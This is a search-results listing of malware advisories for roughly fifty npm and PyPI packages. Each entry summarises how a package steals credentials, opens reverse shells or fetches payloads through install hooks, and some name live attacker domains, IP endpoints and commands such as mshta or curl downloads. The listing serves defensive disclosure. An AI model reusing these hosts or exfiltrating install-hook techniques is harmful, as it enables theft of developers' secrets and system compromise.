225918 matches found
Malicious code in metrics-probe-88ad (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 55133df30aa5d5678607d6f0a32d8b292c4fdf876893978a6785209304434fe6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in fmt-helpers-794b (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 19b05306978ff506805f118049f81c74c5da1503bb34fd14a2a57d4e6faac52c Package declares a postinstall lifecycle hook "postinstall": "node run.js" in package.json that runs run.js automatically on npm install. run.js...
Malicious code in @ncurran/sandbox-recon-sys-5f1b (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0f4f0ce20b0ebc74a6cc6447e493d56421999e17f0f980661c9baab280032850 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/dc-selftest-ba0ad4 (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 945bb6ebb1c34a64499b626b76d65ee3241c5018390eba029b3654bef389786c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-sys-6a3f (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 608b0bb395714d269bf26dcde1f7863b0376062eb1b1707f2a7dd4dac279574b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-7c4e1a (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware c1184134c86ce193b3abfb06949b3ce9ba51711e8e5615405d4f2ab63aa51a89 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-9b2d4f (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e26a43461da776d8145183e606db9c9bdbfaa1a053e76c44ce1f78ec1364ec1f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-sys-5b2c (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 2e23f53a4a0894697fe17ba0cb492b742f0cc7c213b99b42f455d608e14410ae Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-880538 (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1b2312abdf908648141abd660e3384044ccd92cfdfd9ba75feb382aeb49011a1 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @ncurran/sandbox-recon-uac-4e7c (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 115efe1e922669b73488b969fea50128ffb8c0b8a5ef462d6c6319feaf1ce578 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in npm-sandbox-research-f1g2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware bd8a780bcd6850a1b4b810de411bf39db7f5b3f37e581a5a45d0e83215b0f339 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in npm-sandbox-research-a1b2 (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware bd030068356281ae499fe6af7fd86ae10cac9f77f2f3fcc4d2d9abb67750be19 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in uol-simple-api-futebol (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c78d7d6a66f5f57c16ee4d4d39ea4dbfd4ac5b76192de1a8da86099405848334 The package advertises itself as a scraper of UOL football schedules, but its main exported function getJogos routes through getUOLData →...
Malicious code in @civitatis/bot-ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e51e58cf925eb7dd4e084a2e78e22b0a0db0f1f82663101e34110258839f98f7 The package declares "preinstall": "node index.js" in package.json, causing index.js to execute automatically on npm install. index.js requires...
Malicious code in @mastra/observability (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 63af3788f9b84fab72e7db143b8001af24c070088aaab8c4de3323cdf259dd66 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in n8n-nodes-security-test-poc (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fa97d4701c29ef5305fa5b553ab560abd6db6cc33b72f99dc11621997b668f32 Package presents as an n8n community node but is an attack artifact. The node's execute in dist/SecurityTestNode.node.js queries AWS IMDSv1/v2...
Malicious code in swift-parse-stream (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ab8561c6c561b045d817d4fab3aa0754ce7cd767a3c5ec07b95151dda6b92c8 swift-parse-stream advertises itself as an SVG sanitizer/minifier but ships an undocumented getPlugin export in index.js that, when invoked, performs...
Malicious code in quirky-token (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b263413912feb72882ee0b52e7025c636ed98472ba90e6db4714b3b111b4e2e8 The package is advertised as an SVG sanitizer but exposes an undocumented getPlugin export whose returned function fetches JSON from...
Malicious code in sodel-pych (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 95b8b8f54c9c2a4fa965e4a7fe7ea9c8f8ef1b5bcdd4cc1da7354d0ce2e8842f Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in sort-btree (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6c3b0d783c53decf1a240f02276991c7c00a8b72f0d3988a7e86be90464da38d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in profiling-keychain (npm)
The npm package profiling-keychain published by npm user sproger, [email protected] is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains surrprisingcoompanny.lol and barbellmate.xyz. On component mount it registers...
Malicious code in backgroundprocessing-contextmenus (npm)
The npm package backgroundprocessing-contextmenus published by npm user sproger, [email protected] is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains surrprisingcoompanny.lol and barbellmate.xyz. On component mount it...
Malicious code in analytics-readability-gestures (npm)
The npm package analytics-readability-gestures published by npm user sproger, [email protected] is a deceptive React Native component and part of a coordinated 37-package campaign across two attacker-controlled domains surrprisingcoompanny.lol and barbellmate.xyz. On component mount it...
Malicious code in @mastra/voice-playai (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 9279891e04d7670f84ecfe2e8c0d680c63d965a5626b42bc7f393bb7b3d07710 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @mastra/otel-exporter (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware e5d973fa28a778f38f657666d9f26b5ff350ab4de18ae930c3ee9fd4732edfb6 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in cryptodao-config (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b5f3b7ec6eecce3d891664f33660a1c612cdd3c6ac99ba52633ef77a2df543c On npm install, the postinstall hook runs node recon.js, which harvests installer-side secrets and POSTs them over HTTPS with TLS certificate...
Malicious code in backoffice-charges-module (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 047eb92a0e8bb401b2c205765616c9b4b715ee7cfd33d2e6ef9dc8d645b77f04 On every npm install, the preinstall lifecycle script node index.js /dev/null 2&1 silently HTTPS-POSTs a JSON payload to https://avamnrwqo7.rbmock.de...
Malicious code in js-digest (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 52847ff329757e0777e62c1c060455abc4ddd6f002c295a7f38d0e0489daf76f Package impersonates crypto-js: name is js-digest but package.json carries crypto-js's exact description "JavaScript library of cryptography...
Malicious code in conducts (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 5fc899376af9cf86b0ddfddeb5e2a904ce8a5109fc293b0c115c1f7e3633fe2d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in obfus-jsxy (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 9ce27a1ed5e4a461b1b62b5477d05bc1f7ae0b8c41d7a8bc8c116279fa1521e4 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in redis-xyz (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 3995a53806a8d65f0d672a7f946ffd2f1b2b73e30cbc85f19c06e63a081fa811 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in temp-development-package-test (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 5cdc1d94dd0cfb62a4a0267ae52bf1a72dfa31a6854196b4bb220759b7c6e878 Starting with version 0.4, package installs a sitecustomize.py that executes during Python engine initialization. The embeded code uses mshta to download...
Malicious code in tailwind-typography-style (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b5b1eea6bfed81a0e57b9af519c45155347e3937a20dc8ef4e9ab1cae6ff73d The package impersonates @tailwindcss/typography by name and ships a verbatim copy of tailwindlabs/tailwindcss-typography's src/ tree index.js,...
Malicious code in richtext-editor-ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fe87b6998b0d91eb7eefb71e37d8145b5db79b79dd21bc1ffda10d56d64b6d16 On npm install, postinstall.js base64-decodes a hardcoded URL https://www.jsonkeeper.com/b/7EBZP, fetches its body via axios, and pipes the response...
Malicious code in slow-surf (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 9f66d2ad1de3674c7aa5dd5efdb00624f0d1ff7f6f1ed38f054e6ca018dea673 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in testpackagemanyhttpsgo (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 336f39e218fe5b5a09ef8ee7757efa7a0ca73c0fe6571bc232d735448499a950 At install time, setup.py fetches https://tmpfiles.org/dl/wawHVGgfydD7/6a306c5f03a52.exe via urllib, writes the response to disk, and executes it wit...
Malicious code in twrap-toolkit (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 174cba09d5ec9724bd55871c7f74c27ff8592bf55c06464204e0591667377259 twraptoolkit/init.py defines getpayload which issues a plaintext HTTP request to http://194.5.152.9:8080/hacks/textwrap-toolkit/textwraptoolkit/init....
Malicious code in cipherflow (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 281ede3c5b3181c2df22a4b32a01453a51ac389a1dfe8bde69d53821cbaf20d4 cipherflow advertises itself as a zero-dependency pure-Python AES/DES library, but cipherflow/environ.py contains a multi-layer-obfuscated payload th...
Malicious code in @wacrot/infra-data-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1 On any require or import of @wacrot/infra-data-kit, src/index.js invokes addSupport at module top level, which spawns a detached bash -c 'curl -fsSL...
Malicious code in postcss-minify-selector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1bc7341d6762a6209e4bde3d99f31f1a8650b6971e64a19547b9f35e7a51abb3 Package is published as postcss-minify-selector singular but its internal postcss plugin identifier is postcss-minify-selectors plural — the canonica...
Malicious code in yunxin-overmind-comment (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57551a10d99024d1d12c7f2e349e6557613ed3a5e036bf45d71129d501fbbabc On npm install, the package's scripts.postinstall runs src/postinstall.js, which spawns a detached Node child that collects the installer's hostname,...
Malicious code in intel-ai-safety-explainer (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 7561bb0b816a4521b6de43bce01afa55516a7201b6daa7696de4924623557f90 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in hello-test-s1 (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 3e38aef2a7eaa434284aa00122cf429e1a1a07658e02afec7bb3690d7cbfe9ec During installation or importing the module, the package starts a reverse shell to hardcoded locatiom --- Category: MALICIOUS - The campaign has clearly...
Malicious code in dispatch-internal-plugins (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 5993e79eab55ecc24ada6a4bce88f580c958499d51d0d7472e74aad904648964 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in gigl-core (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 28903f76bed2e89a18c9c276d62c95bb089a091020f89f35f7d2800ef6a3bce3 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in intel-ai-safety (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 7bafa4e952ec2e2db6e164f8bf385088c38438396f02f8096c28a6105878e729 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in mozautomation (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 26d0e7dfb965969f23786d4bde7d70e597b83df522434aea471171d48442cd12 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in scriptworker-client (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 b8cdfb6bd0db2d192ccd67b0ebb8023dee7343620b9a48c95cc58b5e1ee536f0 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in testpgagent (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...
Malicious code in flow-lending (npm)
Sentinel-high 9.9.9 dependency-confusion squat of an internal Cardano/DeFi lending pkg. preinstall node index.js || true auto-execs a credential exfil: harvests env secrets mnemonic/private key/token/blockfrost API key and POSTs to raw attacker C2 2.25.140.71:8443/surflending/npm-confusion. 2-pkg...